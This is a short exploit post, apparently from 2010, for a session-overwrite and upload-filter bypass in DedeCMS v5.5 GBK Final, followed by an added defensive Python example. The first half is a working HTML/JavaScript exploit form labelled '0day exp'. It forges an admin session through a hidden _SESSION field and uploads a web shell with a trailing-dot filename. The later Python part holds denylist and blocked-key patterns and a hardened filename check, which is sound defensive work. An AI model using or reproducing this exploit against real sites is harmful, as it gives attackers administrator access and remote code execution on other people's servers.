A marginal vulnerability in DEDECMS v5.5 GBK Final

With session.auto_start enabled, the $_SESSION variables can be overwritten at will from the request. That lets us forge an admin login and upload a file through /DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php; renaming the upload to *.php. (with a trailing dot) gets past the check, so a shell can be uploaded.

exp:

<form action="" method="POST" enctype="multipart/form-data">
URL:<input type="text" name="target" size="50" value="http://192.168.1.110">
Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
File:<input type="file" name="uploadfile" size="25" />(Filetype must be GIF/JPEG etc)
RenameTo:<input type="text" name="newname" value="shell.asp."/><br>
<input type="hidden" name="_SESSION[dede_admin_id]" value="1">
<input type="hidden" name="bkurl" value="1">
<input type="button" value="submit" onclick="fsubmit()"/><br><br><br><br><br><br>
dedecms 0day exp..<br>
need: session.auto_start = 1<br>
By toby57 2010/2/22
</form>
<script>
function fsubmit(){
    var form = document.forms[0];
    // Post to the target's select_soft_post.php
    form.action = form.target.value + form.path.value;
    // bkurl is the final URL of the upload: the trailing dot is dropped by the filesystem
    var tmpstr = form.target.value + '/' + form.newname.value;
    form.bkurl.value = tmpstr.substr(0, tmpstr.length - 1);
    form.submit();
}
</script>
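The two defensive checks this post implies, written here as an added example rather than DedeCMS's own code: a request-parameter screen that rejects names such as _SESSION[dede_admin_id] before anything copies request variables into global scope, and an upload-name check that validates the name the filesystem will actually store (Windows drops trailing dots and spaces, which is why *.php. slips past a check anchored at the end of the string). The denylist regex, the allowlist and the blocked-key prefixes are assumptions for illustration.

```python
import re
from urllib.parse import parse_qs

# Denylist of the shape the "*.php." trick defeats: anchored at end of string, so a
# trailing dot keeps it from matching. Illustrative only, not DedeCMS's own check.
LAX_DENY_RE = re.compile(r"\.(php[345]?|phtml|asp|aspx|jsp)$", re.IGNORECASE)

# Hardened rule: one base name, one allowlisted extension, nothing after it.
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(gif|jpe?g|png)$")

# Request keys that would define PHP superglobals or config variables if the
# application copies request parameters into global scope (assumed prefix list).
BLOCKED_KEY_RE = re.compile(
    r"^(GLOBALS|_SESSION|_SERVER|_GET|_POST|_COOKIE|_REQUEST|_FILES|_ENV|cfg_)",
    re.IGNORECASE,
)


def lax_name_ok(name: str) -> bool:
    """Accepts 'shell.php.' because the denylist only matches at the very end."""
    return LAX_DENY_RE.search(name) is None


def stored_name(name: str) -> str:
    """Name the file gets on a Windows/NTFS host: trailing dots and spaces are dropped."""
    return name.rstrip(". ")


def hardened_name_ok(name: str) -> bool:
    """Validate the name the filesystem will store, and allowlist rather than deny."""
    final = stored_name(name)
    if final != name:  # anything the filesystem would silently alter is rejected
        return False
    return SAFE_NAME_RE.fullmatch(final) is not None


def blocked_request_keys(query: str) -> list:
    """Return parameter names that would clobber a superglobal, e.g. _SESSION[...]."""
    return [k for k in parse_qs(query, keep_blank_values=True) if BLOCKED_KEY_RE.match(k)]


if __name__ == "__main__":
    # Constructed request body modelled on the form in the post above.
    body = "_SESSION[dede_admin_id]=1&bkurl=1&newname=shell.asp."
    print("blocked keys:", blocked_request_keys(body))
    for n in ("shell.php.", "shell.asp.", "photo.jpg"):
        print(n, "lax:", lax_name_ok(n), "stored as:", stored_name(n),
              "hardened:", hardened_name_ok(n))
```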
